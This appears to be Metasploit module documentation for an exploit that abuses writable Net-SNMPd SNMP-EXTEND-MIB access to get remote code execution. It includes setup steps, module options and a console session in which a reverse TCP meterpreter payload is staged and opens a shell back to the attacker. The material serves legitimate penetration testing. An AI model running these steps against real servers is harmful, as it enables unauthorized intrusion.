## Vulnerable Application

  This module uses SNMP extension MIBs to enable remote code execution on the Linux Net-SNMPD servers using the 
  SNMP-EXTEND-MIB.

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
  3. Do: `set rhost [IP]`
  4. Do: `set community [SNMP Community]`
  5. Do: `set version [SNMP Version]`
  6. Configure the payload
  7. Do: `run`
  8. You should get a session

## Options

  **FILEPATH**  
  The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
  
  **COMMUNITY**  
  The read/write community string of the target Net-SNMP service.
  
  **VERSION**  
  The SNMP protocol version. Accepted values are '1' or '2c'. 
  
  **CHUNKSIZE**  
  The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors  
  Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors.  
  This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/].
  
  **TIMEOUT**  
  Specifies the maximum time to allow SNMP to timeout.  
  
  **SHELL**  
  The shell to call for the client. Defaults to '/bin/bash'  


  
## Scenarios

  ```
  msf > use exploit/linux/snmp/net_snmpd_rw_access 
  msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
  payload => linux/x86/meterpreter/reverse_tcp
  msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
  rhost => 192.168.1.3
  msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
  lhost => 192.168.1.2
  msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
  community => private
  msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
  version => 2c

  msf exploit(linux/snmp/net_snmpd_rw_access) > show info
  
         Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
       Module: exploit/linux/snmp/net_snmpd_rw_access
     Platform: 
         Arch: 
   Privileged: No
      License: Metasploit Framework License (BSD)
         Rank: Normal

  Provided by:
    Steve Embling at InteliSecure

  Available targets:
    Id  Name
    --  ----
    0   Linux x86

  Basic options:
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
    COMMUNITY  private          yes       SNMP Community String
    FILEPATH   /tmp             yes       file path to write to 
    RETRIES    1                yes       SNMP Retries
    RHOST      192.168.1.3      yes       The target address
    RPORT      161              yes       The target port (TCP)
    SHELL      /bin/bash        yes       Shell to call with -c argument
    SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT    8080             yes       The local port to listen on.
    SSL        false            no        Negotiate SSL for incoming connections
    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
    TIMEOUT    1                yes       SNMP Timeout
    URIPATH                     no        The URI to use for this exploit (default is random)
    VERSION    2c               yes       SNMP Version <1/2c> 

  Payload information:
    Space: 4096

  Description:
    This exploit module exploits the SNMP write access configuration 
    ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
    remote code execution.

  References:
    https://www.intelisecure.com

  msf exploit(linux/snmp/net_snmpd_rw_access) > run
  
  [*] Started reverse TCP handler on 192.168.1.2:4444 
  [*] Command Stager progress -   1.11% done (199/17924 bytes)
  [*] Command Stager progress -   2.23% done (399/17924 bytes)
  [*] Command Stager progress -   3.34% done (598/17924 bytes)
  [*] Command Stager progress -   4.45% done (797/17924 bytes)
  ... Redacted ...
  [*] Command Stager progress -  98.64% done (17681/17924 bytes)
  [*] Command Stager progress -  99.72% done (17873/17924 bytes)
  [*] Sending stage (857352 bytes) to 192.168.1.3
  [*] Meterpreter session 31 opened (192.168.1.2:4444 -> 192.168.1.3:54232) at 2018-02-14 17:30:22 +0000
  [+] SNMP request timeout (this is promising).
  [*] Command Stager progress - 100.00% done (18022/18022 bytes)

  
  meterpreter > getuid
  Server username: uid=121, gid=129, euid=121, egid=129
  meterpreter > exit
  [*] 192.168.1.3 - Meterpreter session 30 closed.  Reason: User exit

  ```
